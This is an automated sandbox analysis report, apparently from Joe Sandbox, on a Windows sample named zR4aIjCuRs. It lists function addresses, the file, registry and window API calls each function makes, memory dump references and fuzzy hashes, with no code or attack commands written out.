Function 00405D8B Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405990,?,?,00000000,00405B66,?,?,?,?), ref: 00405D90
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA4

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: fe430eedc911e7c92ce83e5abbc00e08444bb0e311ec0623c818608bfa408f6d
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: 1BD0C972504420ABD2512728AF0C89BBB95DB542717028B39FAA9A22B0CB304C568A98

Function 0040586E Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403382,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4

Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8

Function 00406127 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Space available: ,?), ref: 0040614B

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14

Function 00404231 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,?,00000000), ref: 0040424B

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: ItemText
String ID:
API String ID: 3367045223-0
Opcode ID: e97594aea4ef24126c33863332ae7c1030a5f9b1799084ec29790e1dd493689a
Instruction ID: 58c8b0ee816a9f079cb4560b894257bfb9dfa06490f5d5235509ae25e2c95a64
Opcode Fuzzy Hash: e97594aea4ef24126c33863332ae7c1030a5f9b1799084ec29790e1dd493689a
Instruction Fuzzy Hash: 79C04C76148300BFD681BB55CC42F1FB79DEF94315F44C52EB59CA11E2C63A84309B26

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(0002046A,00000000,00000000,00000000), ref: 0040428F

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
Instruction ID: 5c868bdd594fc053bdde718b2d54d3bc7308835e7239c12b28f3ea995dd83e98
Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
Instruction Fuzzy Hash: 3EC09BB27443007BDE118F909D49F1777545790741F18447D7344F51E0D674D450D61C

Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48

Function 00404253 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19

Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D

Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406756
Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778

Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

